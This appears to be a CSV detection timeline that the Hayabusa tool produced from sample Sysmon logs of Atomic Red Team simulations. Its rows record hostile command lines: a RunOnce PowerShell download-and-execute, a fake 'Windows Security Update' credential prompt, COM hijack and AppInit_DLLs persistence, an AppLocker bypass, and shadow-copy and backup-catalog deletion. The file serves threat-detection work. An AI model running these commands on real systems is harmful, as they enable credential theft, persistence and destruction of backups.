2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,../hayabusa-rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,../hayabusa-rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: 
HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 
747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:51.883 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge 
| SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | 
Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,../hayabusa-rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 
747F3D96-D809-5D31-0000-001072292B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.585 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.624 